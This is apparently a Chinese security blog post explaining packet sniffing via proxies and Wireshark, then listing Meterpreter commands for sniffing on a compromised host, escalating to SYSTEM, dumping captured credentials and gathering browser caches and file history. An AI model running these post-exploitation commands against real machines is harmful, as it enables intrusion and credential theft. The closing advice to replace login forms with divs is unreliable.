聲明:禁止用作非法目的,謝絕一切形式的轉載。
當你在登陸某個網站的時候,當你在用ftp登陸傳輸文件的時候,你的密碼可能已經被嗅探到了。黑客利用網絡嗅探可以獲取大量有用的信息。
預備條件
網絡抓包
抓取數據包通常有兩種方式,一種時基於代理服務器的,像Burpsuit、Fiddler等,另一種就是基於網卡,最著名的就是Wireshark。這裏主要指的是抓取web的數據流。
代理服務器
代理服務器
代理服務器英文全稱是(Proxy Server),其功能就是代理網絡用戶去取得網絡信息。形象的說:它是網絡信息的中轉站。代理服務器就好象一個大的Cache,這樣就能顯著提高瀏覽速度和效率。更重要的是:Proxy Server(代理服務器)是Internet鏈路級網關所提供的一種重要的安全功能
抓包原理
下圖展示了數據流的走向,很明顯,這就是大名鼎鼎的"中間人攻擊",所有的數據流都要走代理服務器,因此代理服務器能截獲所有的數據流。Burpsuit以及Fiddler等都是基於這種原理。
網卡
網卡
網卡(NIC)是局域網(LAN,全稱是:Local Area NetWork)中連接計算機和傳輸介質的接口,它工作在物理層(L1)。它是處於主機箱內的一塊網絡接口板,因爲它的存在,從而使得本機能夠與外部局域網進行連接通信。任何一臺計算機,想要進行上網、通信功能,就必須使用網卡。
Wireshark協議分析器原理
網絡上傳輸的數據包通過網卡進入到網絡協議分析器系統。協議分析器所使用的網卡和網卡 驅動程序必須能夠支持“混雜模式操作(Promiscuous Mode Operation)”。因爲只有運行在混雜模式下的網卡才能夠捕獲到網絡中傳輸到其他設備的“廣播數據包、多播數據包、單播數據包以及錯誤數據包等等”,兩者一起協同工作。分析器原理圖如下:
meterpreter網絡嗅探
- 加載嗅探模塊
use sniffer
- 提升權限到System
getsystem
- 列出"肉雞"所有開放的網絡接口
sniffer_interfaces
- 獲取正在實施嗅探網絡接口的統計數據
sniffer_start 3
- dump數據包
sniffer_dump 3 /tmp/test3.cap
- 用wireshark分析數據包,可以看到用戶名密碼都是burning
meterpreter獲取敏感數據
run post/windows/gather/checkvm #是否虛擬機
run post/windows/gather/enum_applications #獲取安裝軟件信息
run post/windows/gather/dumplinks #獲取最近的文件操作
run post/windows/gather/enum_ie #獲取IE緩存
run post/windows/gather/enum_chrome #獲取Chrome緩存
寫在最後
儘量不要使用表單進行登陸,這個可以考慮使用div等來進行替換。對於密碼傳輸,明文是不應該出出現的,因此像FTP這樣的工具應該謹慎使用。
公衆號
更多網絡安全,歡迎關注我的公衆號:無情劍客。